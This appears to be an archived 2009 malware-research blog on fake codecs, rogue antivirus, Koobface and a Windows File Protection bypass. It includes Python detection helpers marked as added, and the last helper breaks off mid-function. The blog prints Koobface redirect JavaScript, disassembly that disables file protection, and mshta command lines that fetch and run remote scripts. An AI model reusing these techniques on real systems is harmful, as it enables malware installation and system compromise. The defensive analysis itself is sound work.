Monday, December 7, 2009

Fake codec used by porn site

Here's another porn site distributing malware under the guise of video codecs:

hxxp://adultsvideo.cn/

Unsuspecting users wanting to view the adult videos are tricked into downloading and installing the fake codec.

The fake codec can be downloaded from this url:

hxxp://freebigutilites.com/ActiveX-Video-Codec.45092.exe

The server spits out files that have different MD5s each time.

ThreatExpert report here

Update:

Here's another site that purports to host "Free Full Lenght Movie" porn clips and uses fake video codecs in order to lure unsuspecting users into downloading and installing their rogue antivirus software:

hxxp://freeanalsextubemovies.com/video1483/porn/

Clicking anywhere on the video screen area gives us the following link to a file named video.exe:

hxxp://homeamateurclips.com/video/video.exe

This is fake antivirus software from the Security Tool family of Fake AVs.

Tuesday, November 3, 2009

MaCatte scareware fools users by masquerading as McAfee

[screenshot: rogue2]

MaCatte Antivirus is a rogue av that attempts to impersonate McAfee scanners in order to scam users.

This scareware has been seen to be using a bogus My Computer online scan similar to ones we've seen here, here and here.

[screenshot: rogue6]

The online scan can be seen on this url:

hxxp://proscan5.info/25/26-088wLzQzL1EzL==

The downloader served from this url is time-sensitive and stops working after a period of time. A session ID of some sort is embedded in the binary executable itself. Once that time has elapsed, the downloader tells the user to contact MaCatte Antivirus support. This prevents reverse-engineers from replicating the infection and gathering samples for analysis.

Presence of these files / folders would signal infection from this scareware:
C:\Documents and Settings\All Users\Application Data\msca
C:\Documents and Settings\All Users\Application Data\msca\MaCatte.ico
C:\Documents and Settings\All Users\Application Data\msca\mcull.exe
C:\Documents and Settings\All Users\Application Data\msca\msc.exe
C:\Documents and Settings\All Users\Application Data\msca\Viruses.dat
C:\Documents and Settings\All Users\Application Data\Microsoft\Media\WPtect.dll
C:\Documents and Settings\All Users\Desktop\MaCatte.lnk
C:\Documents and Settings\All Users\Start Menu\Programs\MaCatte
C:\Documents and Settings\All Users\Start Menu\Programs\MaCatte\MaCatte.lnk


Unsuspecting users are set back a hefty $99 of their hard-earned money.

Stay away from these rogue apps.

Wednesday, October 21, 2009

Sysinternals Releases Disk2vhd v1.0

Sysinternals has recently released Disk2vhd that "simplifies the migration of physical systems into virtual machines (p2v)."

Disk2vhd is a utility that creates VHD (Virtual Hard Disk, Microsoft's Virtual Machine disk format) versions of physical disks for use in Microsoft Virtual PC or Microsoft Hyper-V virtual machines (VMs).


More here.

Thursday, October 15, 2009

Sysguard / Winifighter Clones

Here are some screenshots of the members of this scareware family:

[animated screenshots (gickr.com)]

Beware of these rogue apps.

Tuesday, October 13, 2009

Winifighter Clone: TrustFighter

[screenshot: RogueAntiSpyware.Winifighter_TrustFighter6]

Another scareware has been spotted in the wild and it calls itself TrustFighter. This is a recent addition to the Winifighter family of scareware.

Like the other members of this scareware family described in a previous post, TrustFighter creates heaps of junk binary files in the %systemroot% and %system% directories.

Sample junk files are the following:



Here are some domains participating in this campaign:

securityannounce(dot)com
securityadjust(dot)com
bestmalwaredetect(dot)com
pcprotectzone(dot)com
trustfighter(dot)com


Unsuspecting users are set back $49.95 of their hard-earned money.

Friday, September 25, 2009

Bogus MS Update

We have been receiving bogus emails claiming to be coming from Microsoft:

...public distribution of this Update through the official website »www.microsoft.com would have result in efficient creation of a malicious software, we made a decision to issue an experimental private version of an update for all users Microsoft Windows OS.
as the computer set to receive notifications when new updates are available, which you have received this notice.

We have seen emails containing one of the following links:
hxxp://www2.sinel.com/microsoftupdate.html
hxxp://mail1.e-corecorporation.com/default.htm


They seem to be compromised websites being used by the bad guys to facilitate this attack.

The page default.html from hxxp://mail1.e-corecorporation.com/default.htm uses a refresh-type redirect to this url:
hxxp://0xc0.0xdc.0x6e.0xe4/microsoftupdate.html

The page microsoftupdate.html from sinel.com and 0xc0.0xdc.0x6e.0xe4 both execute another refresh-type redirect in order to download a Zeus malware with filename update09.exe.

Interestingly enough, this attack uses 0xc0.0xdc.0x6e.0xe4 to serve the malware. This IP-address translates to 192.220.110.228, which in turn resolves to summit102.summitdesign.net, another possibly compromised website used in this attack.
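The dotted-hex host above is one of several numeric forms a URL host can take, all of which the resolver treats as the same address. As an added example (not from this post), here is a Python parser that canonicalises such hosts to dotted decimal so they can be matched against a block list; it generalises beyond the dotted-hex case to dotted octal, mixed, and single-integer forms. All names are my own.

```python
import re
from urllib.parse import urlsplit, urlunsplit


def _parse_part(part):
    """Parse one dotted component with C inet_aton rules: 0x = hex,
    leading 0 = octal, otherwise decimal. Returns None if malformed."""
    if re.fullmatch(r'0[xX][0-9a-fA-F]+', part):
        return int(part[2:], 16)
    if re.fullmatch(r'0[0-7]*', part):
        return int(part, 8) if len(part) > 1 else 0
    if re.fullmatch(r'[1-9][0-9]*', part):
        return int(part, 10)
    return None


def numeric_host_to_ipv4(host):
    """Return the canonical dotted-decimal form of a numeric host, or None
    if the string is not a numeric IPv4 address (e.g. a real hostname)."""
    parts = host.split('.')
    if not 1 <= len(parts) <= 4:
        return None
    values = [_parse_part(p) for p in parts]
    if any(v is None for v in values):
        return None
    *lead, last = values
    if any(v > 0xff for v in lead):
        return None
    # As in inet_aton, the final component fills all remaining bytes,
    # so "192.220.28388" and "3235671780" are both valid spellings.
    remaining = 4 - len(lead)
    if last >= 1 << (8 * remaining):
        return None
    octets = lead + list(last.to_bytes(remaining, 'big'))
    return '.'.join(str(o) for o in octets)


def normalize_url_host(url):
    """Rewrite a URL whose host is a disguised numeric address into plain
    dotted decimal so it can be compared with a block list; any other URL
    is returned unchanged."""
    parts = urlsplit(url)
    if not parts.hostname:
        return url
    canonical = numeric_host_to_ipv4(parts.hostname)
    if canonical is None:
        return url
    netloc = canonical + (f':{parts.port}' if parts.port else '')
    return urlunsplit((parts.scheme, netloc, parts.path, parts.query, parts.fragment))
```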

The presence of the following files/folders may indicate signs of infection:
%System%\sdra64.exe
%Temp%\tmp.exe
%System%\lowsec\


More here.

Tuesday, September 22, 2009

Another Shameless SEO based on Atlanta Flooding

Users Googling "Atlanta flood pictures" receive yet another SEO attack, this time via a possibly compromised legitimate Australian website for restaurants in the famous Bondi area.

Here's a screenshot of a google search result:
[screenshot: atlanta_flood_google]

A Fiddler capture shows us the redirections:
[screenshot: atlanta_fiddle]

So we go from
hxxp://idrb.com/pdf_files/atlanta-flood-pictures.html
>hxxp://06d.ru/t.php
>>hxxp://read-cnn2.com/?pid=207&sid=de9f8f
>>>hxxp://winfixscanner7.com/scan1/?pid=207&engine=pHTyzjTyMzEyOS44Mi4xOTAmdGltZT0xMjUuNgAMPAVN


An installer named Soft_207.exe will be presented for download, which is a variant of the Total Security family of Fake AVs.

At the moment, the following domains have been observed to have been involved in this attack:

winfixscanner7(dot)com
15scanner(dot)com


These domains resolve to the following IP addresses:
89.47.237.55
89.248.174.61
213.163.89.60


But knowing the trend in scareware, there could be heaps more domains being created as we speak.

Friday, September 18, 2009

Koobface on the Move, Serving Scareware !!

We have been seeing a lot of new movement on the koobface front lately.

[screenshot: koob_fiddle]

As koobface-serving domains are taken down as soon as the good guys discover them, the bad guys respond by registering new ones. At the moment, their C&C server is hosted in China at IP address 61.235.117.83.

The bad guys are still using a fake facebook website, as well as posing as a fake codec, in order to distribute koobface.

[screenshot: fake_facebook]

Clicking anywhere on the page presents us with a file named setup.exe. Here are some of the IPs being used to distribute koobface:

[screenshot: koob_script]



The javascript component used by koobface remains basically the same as before.

And as before, koobface is still serving up scareware. From time to time, users are presented with a My Computer online scan, going through these domains:

[screenshot: rogue]

gotrioscan(dot)com
plazec(dot)info


In some instances, we also get these warnings:

[screenshot: hardware_error]
[screenshot: Internet_Antivirus_Pro]

At the moment, these warnings are serving Internet Antivirus Pro.

Update:
Koobface has been going at it and here's another one that spoofs youtube and serves koobface malware as a fake codec:

hxxp://71.197.170.226/d=www.marcellaburnard.com/0x3E8/view/console=yes/?go

Thursday, August 27, 2009

Porn site distributes scareware

Another website has recently been spotted to be serving up malware in the guise of fake video codecs.

This one bills itself as "The Best Nude Celebrity Movie Site":
hxxp://alyssafan.net/1.html

[screenshot: face_codec]

But in order to watch any video, we would need to download and install their "Certified ActiveX video codec (VAC codec) use to protect content Copyrights".

The fake codec can be downloaded here:
hxxp://alyssafan.net/Mediacodec_v4.8.exe

One of the components used in this attack is an obfuscated javascript file that can be found in the %temp% folder.

[screenshot: obfuscated]

This script translates to:

[screenshot: deobfuscated]

This script downloads:
hxxp://ue4x08f5myqdl.cn/u3.exe

Which then gives us scareware Safety Center:

[screenshot: safetycenter]

Beware of fake video codecs!

Friday, August 21, 2009

Scareware asking for ransom: System Security

system_security_scan

Scareware is BIG business. They use heaps of scare tactics in order to convince unsuspecting users into buying rogue applications. But here's one that does a bit more than just scaring.

System Security terminates almost all running processes. This basically prevents us from using our computers. More importantly, this hinders execution of tools necessary to investigate the infection and aid in removal of this rogue app.

Back in the day, in order to evade detection and removal, malware writers targeted security-related applications. They kept a blacklist of applications including (but not limited to) the following:

avast.exe
avp.exe
cmd.exe
icesword.exe
kav.exe
regedit.exe
taskmgr.exe


But now they block even the most harmless Windows applications such as calc.exe and notepad.exe. Not every application can be terminated, though, because that basically means no Windows, and no Windows means no profit: the bad guys need basic Windows functionality. This tells us that they have probably stopped using blacklisting and shifted to whitelisting instead. They now keep a list of applications that they allow to run on the system.

Here's part of some disassembly taken from a sample of System Security, showing us evidence of whitelisting:

Rogue app takes a snapshot of all the processes in the system:

.rsrc:140B4B4F push edi
.rsrc:140B4B50 push 2
.rsrc:140B4B52 call CreateToolhelp32Snapshot
.rsrc:140B4B57 mov [ebp+hObject], eax
...
.rsrc:140B4B79 push ecx
.rsrc:140B4B7A push eax
.rsrc:140B4B7B mov [ebp+var_64C], 22Ch
.rsrc:140B4B85 call Process32FirstW
...
.rsrc:140B4BAB push [ebp+dwProcessId] ; dwProcessId
.rsrc:140B4BB1 push 0 ; bInheritHandle
.rsrc:140B4BB3 push 1FFFFFh ; dwDesiredAccess
.rsrc:140B4BB8 call ds:OpenProcess


It then terminates the processes not found in the whitelist:
.rsrc:140B4C00 push 0FFFFFFFFh ; uExitCode
.rsrc:140B4C02 push edi ; hProcess
.rsrc:140B4C03 call ebx ; TerminateProcess


and displays this message as a notification in the system tray:
.rsrc:14039998 aApplicationCan: ; DATA XREF: sub_140B4ADD+16A
.rsrc:14039998 unicode 0,
.rsrc:14039998 unicode 0,
.rsrc:14039998 dw 0Ah
.rsrc:14039998 unicode 0, ,0
.rsrc:14039A5E align 10h
.rsrc:14039A60 aWarning: ; DATA XREF: .rsrc:140104BF
.rsrc:14039A60 ; sub_140B4ADD+1DB ...
.rsrc:14039A60 unicode 0, ,0
.rsrc:14039A72 align 4


[screenshot: systemsecurity]

It then resumes processing the snapshot created earlier and the cycle continues:
.rsrc:140B4CDF lea eax, [ebp+var_64C]
.rsrc:140B4CE5 push eax
.rsrc:140B4CE6 push [ebp+hObject]
.rsrc:140B4CEC call Process32NextW


Here's the list of applications that the scareware allows:
.rsrc:14046A48 off_14046A48 dd offset aAlg_exe ; DATA XREF: sub_140B49CF+26
.rsrc:14046A48 ; "alg.exe"
.rsrc:14046A4C dd offset aCsrss_exe ; "csrss.exe"
.rsrc:14046A50 dd offset aCtfmon_exe ; "ctfmon.exe"
.rsrc:14046A54 dd offset aExplorer_exe ; "explorer.exe"
.rsrc:14046A58 dd offset aServices_exe ; "services.exe"
.rsrc:14046A5C dd offset aSlsvc_exe ; "slsvc.exe"
.rsrc:14046A60 dd offset aSmss_exe ; "smss.exe"
.rsrc:14046A64 dd offset aSpoolsv_exe ; "spoolsv.exe"
.rsrc:14046A68 dd offset aSvchost_exe ; "svchost.exe"
.rsrc:14046A6C dd offset aSystem ; "system"
.rsrc:14046A70 dd offset aIexplore_exe ; "iexplore.exe"
.rsrc:14046A74 dd offset aLsass_exe ; "lsass.exe"
.rsrc:14046A78 dd offset aLsm_exe ; "lsm.exe"
.rsrc:14046A7C dd offset aNvsvc_exe ; "nvsvc.exe"
.rsrc:14046A80 dd offset aWininit_exe ; "wininit.exe"
.rsrc:14046A84 dd offset aWinlogon_exe ; "winlogon.exe"
.rsrc:14046A88 dd offset aWscntfy_exe ; "wscntfy.exe"
.rsrc:14046A8C dd offset aWuauclt_exe ; "wuauclt.exe"


As we can see, System Security is more than just scareware. You won't be able to use your computer properly unless you buy the rogue app. Sounds more like ransomware to me.

But now that we know it uses whitelisting, we can work around and bypass this technique. We can rename a copy of the tools we need to run as one of the whitelisted applications, and voila! We've taken one step toward regaining full use of our infected computer.
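As an added example (not the post's own code), here is a small Python helper that pulls the whitelist out of an IDA listing in the format shown above and reports which processes the rogue app would terminate, including a check that the rename workaround passes its name test. The listing excerpt and the process list are constructed, and the function names are mine.

```python
import re

# Constructed excerpt of the whitelist table in the IDA format shown in the
# post (the first entry's string sits on a continuation comment line).
WHITELIST_LISTING = """\
.rsrc:14046A48 off_14046A48 dd offset aAlg_exe ; DATA XREF: sub_140B49CF+26
.rsrc:14046A48 ; "alg.exe"
.rsrc:14046A4C dd offset aCsrss_exe ; "csrss.exe"
.rsrc:14046A54 dd offset aExplorer_exe ; "explorer.exe"
.rsrc:14046A68 dd offset aSvchost_exe ; "svchost.exe"
.rsrc:14046A6C dd offset aSystem ; "system"
.rsrc:14046A8C dd offset aWuauclt_exe ; "wuauclt.exe"
"""

# IDA prints the referenced string as a trailing ; "..." comment.
QUOTED_STRING_RE = re.compile(r';\s*"([^"]+)"\s*$')


def parse_whitelist(listing):
    """Collect the quoted image names from the `dd offset` table."""
    names = set()
    for line in listing.splitlines():
        m = QUOTED_STRING_RE.search(line)
        if m:
            names.add(m.group(1).lower())
    return names


def image_name(path_or_name):
    """The snapshot's szExeFile is just the image name, so the directory a
    tool runs from makes no difference to the rogue's decision; Windows
    file names are compared case-insensitively."""
    return path_or_name.replace('/', '\\').rsplit('\\', 1)[-1].lower()


def is_allowed(process, whitelist):
    return image_name(process) in whitelist


def triage_processes(processes, whitelist):
    """Split a process list into what the rogue leaves alone and what it
    would call TerminateProcess on."""
    allowed, killed = [], []
    for p in processes:
        (allowed if is_allowed(p, whitelist) else killed).append(p)
    return allowed, killed


def renamed_copy_survives(tool, alias, whitelist):
    """The workaround from the post: a copy of `tool` saved under the
    whitelisted name `alias` is left running."""
    return (not is_allowed(tool, whitelist)) and is_allowed(alias, whitelist)


# Constructed process list: an infected XP box plus an analyst's tools.
SAMPLE_PROCESSES = [
    "System",
    r"C:\WINDOWS\system32\csrss.exe",
    r"C:\WINDOWS\explorer.exe",
    r"C:\WINDOWS\system32\svchost.exe",
    r"C:\Tools\procexp.exe",
    r"C:\WINDOWS\system32\taskmgr.exe",
    r"C:\WINDOWS\system32\cmd.exe",
]
```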

Thursday, August 20, 2009

Rogue AV Clone: Windows Protection Suite

[screenshot: WindowsProtectionSuite-site]

Another scareware has been spotted and it calls itself Windows Protection Suite.

You can get Windows Protection Suite from one of these urls:



It uses the same tactic seen in earlier posts here and here, where the website claims to scan the unsuspecting user's computer, detects heaps of infections, and offers a bogus solution.

[screenshot: scan]

Looking at the installed scareware we find out that Windows Protection Suite is nothing but a clone of Windows Security Suite.

[screenshot: WPS]

Even their websites are clones:

[screenshot: WPS_WEB]

hxxp://windowsprotectionsuite.com
hxxp://windowssecuritysuite.com

Wednesday, August 19, 2009


Thursday, August 13, 2009

Social engineering trick leads to Rogue AV: MacroVirus

I was reading a blog about a Rogue AV then I noticed a suspicious comment on it:

[screenshot: tiny_comment]

In it, the user was recommending an antispyware program and gave the following url:
www(dot)tinyurl(dot)com/qlft9c

Following the link, tinyurl does its magic and we are directed to:

hxxp://macrovirus(dot)com/?hop=starbasi

[screenshot: macrovirus]

If we believe everything we see and hear, we'll be downloading and installing a scareware:

[screenshot: macrovirus_run]

Here we can see that the bad guys are clearly taking advantage of the url shortening service from tinyurl.com.

Also, you might notice, there's a striking resemblance between the following:

bassey edet
and
hxxp://macrovirus(dot)com/?hop=starbasi

This is probably giving us a hint as to how the bad guys get paid.

If you got this scareware, remove it immediately.

Tuesday, August 11, 2009

Rogue AV: Winifighter

[screenshot: winfighter]

We've talked about digital clutter on a previous post.

But this one's a real bugger. Winifighter creates heaps of junk binary files in the %systemroot% and %system% directories. The filenames, contents, and file sizes are all random. The names, however, contain bits and pieces taken from malware names such as the following:

backdoor
not a virus
spy
trojan
virus
worm


This one also spoofs the Windows Security Center to give itself an authentic feel and advises unsuspecting users to register Winifighter.

[screenshot: winifighter_windowssecuritycentre]

And of course we also have those ever so genuinely adorable warning messages:

[screenshot: fakealert1]
[screenshot: fakealert2]

As always, I advise everyone to steer clear of these Rogue AVs.

Monday, August 10, 2009

Facebook: Rogue AV Farm?

There has been enormous movement related to koobface lately and it has been mostly driven by social networking websites such as Facebook, Tagged, Myspace, Twitter, and many others.

One social networking website that probably tops the list of sites used as attack vectors is Facebook.

Here's a screenshot of a spoofed Facebook website:

[screenshot: koob1]

We are presented with a fake codec alert, and unsuspecting users usually download and install the Koobface malware:

[screenshot: koob2]

We have seen koobface being hosted on kukuruku-290709(dot)com, but thanks to all the good guys out there this site has been taken down. The bad guys have responded, however, and are now using legitimate domains and redirections to serve koobface. We have seen a small patch of code on the websites used in the redirection:

wrttnsvqnayay qrqgtlzac
script src ="4fc . js" // edited
qsmypwqmoj bbaspbrq


The strings are random, and so are the names of the javascript files being executed.

Here's what the javascript file has to offer:

// KROTEG
// Both gateway URLs are identical here; abc is an implicit global.
var abc1 = 'http://kukuruku-290709.com/go/';
var abc2 = 'http://kukuruku-290709.com/go/';
var ss = '' + location.search;
if ((location.search).length>0) abc = abc1; else abc = abc2;
// Referrer substring -> landing page tailored to that social network.
var redirects = [
['facebook.com', abc+'fb.php'],
['tagged.com', abc+'tg.php'],
['friendster.com',abc+'fr.php'],
['myspace.com', abc+'ms.php'],
['msplinks.com', abc+'ms.php'],
['myyearbook.com',abc+'yb.php'],
['fubar.com', abc+'fu.php'],
['twitter.com', abc+'tw.php'],
['hi5.com', abc+'hi5.php'],
['bebo.com', abc+'be.php']
];
var s = '' + document.referrer, r = false;
// The loop header, the referrer test and the first assignment to redir were
// swallowed by HTML extraction on this page (everything between "i" and "0)"
// was read as a tag); the three lines below are reconstructed from context.
for (var i = 0; i < redirects.length; i++) {
    if (s.indexOf(redirects[i][0]) != -1) {
        var redir = redirects[i][1] + ss;
        // Tack on the hijacked site's host so the gateway knows where the visitor came from.
        if (ss.length > 0) redir=redir+'&domain='+location.host; else redir=redir+'?domain='+location.host;
        location.href = redir;
        r = true;
        break;
    }
}
// No known referrer: everyone else goes to the generic landing page.
if (!r) location.href = abc+'index.php'+ location.search;


Since the domain kukuruku-290709(dot)com has been brought down already, we'll soon most likely see new ones emerge to host koobface.

One of the payloads of koobface is downloading other malware, and currently it is serving the fake AV called System Security.

[screenshot: system_security_scan]

A few weeks ago there was a lot of buzz about Facebook's Farm Town app serving up Rogue AVs, and now Facebook is once again associated with Rogue AVs. Clearly, the bad guys behind these attacks are trying to make quick bucks by promoting scareware. And of course, by using techniques such as social engineering, malware and scareware spread rather quickly and easily, because attackers can hide behind the names of even the people we trust.

Take extreme care when viewing emails, tweets, comments or posts, even if they come from people we know.

Thursday, August 6, 2009

Rogue AV: Antivirus Plus

Here's another Rogue AV out there, and it's being served by more than one domain:

[screenshot: antivirusplus1]

Here's a list of some of the domains used to host this Rogue AV:



[screenshot: antivirusplus]

Stay away from these rogue domains and block them if you have any means of doing so.

Wednesday, August 5, 2009

Rogue App: System Cleaner

I visited this rogue domain:

hxxp://antivirussecurescannerv3.com

[screenshot: antivirussecurescannerv3.com]

The website proceeded to show me that it was scanning my machine for system errors, that it was doing a wonderful job because it had found heaps of problems on my machine, and that it was very eager to fix them.

To give the website some kind of authentic feel, it also showed me which browser I am using, my operating system, and my IP address.

It was also offering 60% discount on the product. Isn't that a good deal?

Now, if the dubious scanning and the overall feel of the website did not give away its real intentions, and if we are to be lulled into buying their software, well... hold on a minute!

If you look at my screenshot, you'll notice that the rogue website was reporting errors about the Windows TEMP folder and Internet Explorer temp files. But how can that be? As I mentioned in a previous post, I am not running Windows!

As usual, unsuspecting users get ripped off for crappy software. So be careful!

Monday, August 3, 2009

Malware foils Windows File Protection

I came across a malware that replaces %system%\comres.dll, which in turn runs the malware each time this library is loaded.

This file is actually protected by the Windows File Protection feature, which was introduced in Windows 2000 (see here).

According to this Microsoft article:


Windows File Protection (WFP) prevents programs from replacing critical Windows system files. Programs must not overwrite these files because they are used by the operating system and by other programs. Protecting these files prevents problems with programs and the operating system.


In this post, we'll be looking at how a malware bypasses the Windows File Protection feature in order to replace the critical system file %system%\comres.dll with a copy of the malware.

The malware first disables the Windows File Protection feature (yes, it can be disabled!):


PUSH 0 ; /IsShown = 0
PUSH Avidm_dl.00BBAB7C ; |DefDir = ""
PUSH Avidm_dl.00AC54D8 ; |Parameters = "/REVERT"
PUSH EAX ; |C:\WINDOWS\system32\sfc.exe
PUSH Avidm_dl.00AC54D0 ; |Operation = "open"
PUSH 0 ; |hWnd = NULL
CALL DWORD PTR DS:[<&ShellExecuteA>] ; \ShellExecuteA
...
PUSH ECX ; /pHandle
PUSH 0F003F ; |Access = KEY_ALL_ACCESS
PUSH 0 ; |Reserved = 0
PUSH Avidm_dl.00AC5498 ; |Subkey = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
PUSH 80000002 ; |hKey = HKEY_LOCAL_MACHINE
CALL DWORD PTR DS:[<&RegOpenKeyExA>] ; \RegOpenKeyExA
MOV EAX,DWORD PTR SS:[ESP+10]
LEA EDX,DWORD PTR SS:[ESP+14]
PUSH 4 ; /BufSize = 4
PUSH EDX ; |0xffffff9d
PUSH 4 ; |ValueType = REG_DWORD
PUSH 0 ; |Reserved = 0
PUSH Avidm_dl.00AC548C ; |ValueName = "SfcDisable"
PUSH EAX ; |hKey
MOV DWORD PTR SS:[ESP+2C],-63 ; |
CALL DWORD PTR DS:[<&RegSetValueExA>] ; \RegSetValueExA
MOV ECX,DWORD PTR SS:[ESP+10]
PUSH ECX ; /hKey
CALL DWORD PTR DS:[<&RegCloseKey>] ; \RegCloseKey


The malware then saves a copy of %system%\sfc_os.dll as %system%\sfc_my.dll:


PUSH 1 ; /FailIfExists = TRUE
REPNE SCAS BYTE PTR ES:[EDI] ; |
MOV ECX,EBP ; |
DEC EDI ; |
SHR ECX,2 ; |
REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] ; |
MOV ECX,EBP ; |
LEA EAX,DWORD PTR SS:[ESP+120] ; |
AND ECX,3 ; |
PUSH EAX ; |new filename: C:\WINDOWS\system32\sfc_my.dll
REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI] ; |
LEA ECX,DWORD PTR SS:[ESP+228] ; |
PUSH ECX ; |existing filename: C:\WINDOWS\system32\sfc_os.dll
CALL DWORD PTR DS:[<&CopyFileA>] ; \CopyFileA


It then loads the newly copied file and resolves an export by ordinal #5, the undocumented API SetSfcFileException, which it calls to disable Windows File Protection for %system%\comres.dll (Windows COM services):


PUSH EDX ; /C:\WINDOWS\system32\sfc_my.dll
CALL DWORD PTR DS:[<&LoadLibraryA>] ; \LoadLibraryA
PUSH 5 ; /ProcNameOrOrdinal = #5
PUSH EAX ; |hModule
CALL DWORD PTR DS:[<&GetProcAddress>] ; \GetProcAddress
...
PUSH EDX ; c:\windows\system32\comres.dll
PUSH 0
CALL EBP ; sfc_my.#5


[screenshot: ordinal5]

The malware then saves the original comres.dll as comresdk.dll, removes comres.dll in %dllcache%, and it is now ready to use the name comres.dll in %system%:


PUSH EDX ; /newname: comresdk.dll
PUSH EAX ; |oldname: comres.dll
CALL ; \rename
...
PUSH EDX ; /path=C:\WINDOWS\system32\dllcache\comres.dll
CALL ; \remove
...
PUSH 1 ; /FailIfExists = TRUE
PUSH EAX ; |NewFilename: C:\WINDOWS\system32\comres.dll
PUSH ECX ; |ExistingFilename:
CALL DWORD PTR DS:[<&CopyFileA>] ; \CopyFileA


There we have it folks: the malware foiled the Windows File Protection feature using perfectly legitimate and readily available methods.
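As an added example (not from the post), here is a Python check for the artefacts this technique leaves behind: the SfcDisable value the disassembly writes (-63h, which the debugger comment shows as 0xffffff9d), decoded as a signed DWORD, plus the file swaps in %system%. The registry export and the directory listing are constructed, and the function names are mine.

```python
import re

# Constructed .reg-style export of the Winlogon key after the malware ran.
WINLOGON_REG = r"""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"SfcDisable"=dword:ffffff9d
"SFCScan"=dword:00000000
"""

# Constructed directory listing of %system% after the swap.
SYSTEM_DIR = r"C:\WINDOWS\system32"
SAMPLE_FILES = [
    SYSTEM_DIR + r"\comres.dll",     # now the malware
    SYSTEM_DIR + r"\comresdk.dll",   # the original, parked aside
    SYSTEM_DIR + r"\sfc_os.dll",
    SYSTEM_DIR + r"\sfc_my.dll",     # private copy used for ordinal #5
    # SYSTEM_DIR + r"\dllcache\comres.dll" was removed, so WFP has no
    # pristine copy left to restore from.
]


def sfc_disable_value(reg_text):
    """Return SfcDisable as a signed 32-bit integer, or None if absent."""
    m = re.search(r'^"SfcDisable"=dword:([0-9a-fA-F]{1,8})\s*$', reg_text, re.M)
    if not m:
        return None
    raw = int(m.group(1), 16)
    # REG_DWORD is unsigned on disk; -63h was stored as ffffff9d.
    return raw - (1 << 32) if raw & 0x80000000 else raw


def wfp_indicators(reg_text, file_list, system_dir=SYSTEM_DIR):
    """Collect the artefacts of the technique the post walks through."""
    findings = []
    value = sfc_disable_value(reg_text)
    if value is not None and value != 0:
        findings.append(
            f"SfcDisable set to {value} (0x{value & 0xffffffff:08x}); "
            "0 is the enabled state")
    present = {p.lower() for p in file_list}
    sysdir = system_dir.lower()
    if sysdir + r"\sfc_my.dll" in present:
        findings.append("private copy of sfc_os.dll present as sfc_my.dll")
    if sysdir + r"\comresdk.dll" in present:
        findings.append("original comres.dll parked as comresdk.dll")
    if (sysdir + r"\comres.dll" in present
            and sysdir + r"\dllcache\comres.dll" not in present):
        findings.append("comres.dll has no dllcache backup; WFP cannot restore it")
    return findings
```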

Thursday, July 30, 2009

Rogue AV: Antivirus Plus

Here's another Rogue AV using the same animated system scan in the internet browser as the one in a previous post.

[screenshot: aplus_scan]

In some instances, Antivirus Plus uses this animated scan instead:

[screenshot: aplus_scan2]

It also uses one of those warnings that look oh so genuinely sincere:

[screenshot: aplus_warning]

Then of course downloading and installing the rogue app gives us the usual scan results:

[screenshot: antivirusplus]

Here's a list of domains currently serving this rogue app:


hxxp://adoimi.cn
hxxp://yourguardpro.cn
hxxp://yourcheckpoisonpro.cn
hxxp://yourfriskviruspro.cn
hxxp://antivirusplus09.com
hxxp://antivirusplus-ok.com
hxxp://addedantiviruspro.com


[screenshot: aplus]

Because of the same animated system scan that they use, I reckon System Security and Antivirus Plus are two related rogue apps.

Wednesday, July 29, 2009

Digital clutter

In relation to a previous post, visiting the malicious domain

hxxp://zusojbktvo.cn/fin.php

leads us into downloading

hxxp://woqyymmptn.cn/setup/setup.exe

This malware in turn runs the Microsoft HTML Application host (mshta.exe) to execute hxxp://enjnzdfmts.cn/33t.php:

00400256 >/$ 6A 00 PUSH 0 ; /IsShown = 0
00400258 |. 6A 00 PUSH 0 ; |DefDir = NULL
0040025A |. 68 39024000 PUSH setup.00400239 ; |Parameters = "http://enjnzdfmts.cn/33t.php"
0040025F |. 68 2F024000 PUSH setup.0040022F ; |FileName = "mshta.exe"
00400264 |. 6A 00 PUSH 0 ; |Operation = NULL
00400266 |. 6A 00 PUSH 0 ; |hWnd = NULL
00400268 |. E8 81010000 CALL ; \ShellExecuteA


The url hxxp://enjnzdfmts.cn/33t.php gives us a page with an obfuscated javascript:

[screenshot: 33t]

Which translates to:

[screenshot: 33t.deobfuscated]

The script basically creates and executes files in an attempt to download and install more malware on the affected machine. In the process, it opens an FTP connection to woqyymmptn.cn with the following credentials:


username: qqq
password: 123456


[screenshot: ftp]

It also creates a batch file that creates numerous Scheduled Tasks that run mshta.exe to execute hxxp://woqyymmptn.cn/33t.php which basically does the same thing as the above script.

[screenshot: jobs]
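As an added example (not from the post), here is detection logic for the mshta.exe behaviour described above, run over constructed process-creation records: mshta.exe launched directly on a remote URL, and a task-scheduling command whose action is mshta.exe plus a remote URL. The schtasks command line is an assumption, since the post does not show the batch file's exact command; all names are mine.

```python
import re

# Constructed process-creation records (the fields a Sysmon EventID 1 or
# EDR feed provides). The first mirrors the setup.exe -> mshta.exe step in
# the post; the schtasks line is an assumed shape for the scheduled jobs.
SAMPLE_EVENTS = [
    {"parent": r"C:\Temp\setup.exe",
     "image": r"C:\WINDOWS\system32\mshta.exe",
     "cmdline": "mshta.exe http://enjnzdfmts.cn/33t.php"},
    {"parent": r"C:\WINDOWS\system32\cmd.exe",
     "image": r"C:\WINDOWS\system32\schtasks.exe",
     "cmdline": 'schtasks /create /sc minute /mo 10 /tn upd1 '
                '/tr "mshta.exe http://woqyymmptn.cn/33t.php"'},
    {"parent": r"C:\Program Files\Vendor\installer.exe",
     "image": r"C:\WINDOWS\system32\mshta.exe",
     "cmdline": r'"C:\WINDOWS\system32\mshta.exe" C:\Program Files\Vendor\setup.hta'},
    {"parent": r"C:\WINDOWS\system32\services.exe",
     "image": r"C:\WINDOWS\system32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

URL_RE = re.compile(r'\b(?:https?|ftp)://[^\s"\']+', re.I)
TASK_TOOL_RE = re.compile(r'(?:^|[\s\\"])(?:schtasks|at)(?:\.exe)?\b', re.I)


def first_token(cmdline):
    """Image part of a command line, tolerating a quoted full path."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        return cmdline[1:].split('"', 1)[0]
    return cmdline.split(None, 1)[0] if cmdline else ""


def mshta_remote_url(cmdline):
    """URL if this command line runs mshta.exe directly on a remote HTA;
    a local .hta argument is normal and does not match."""
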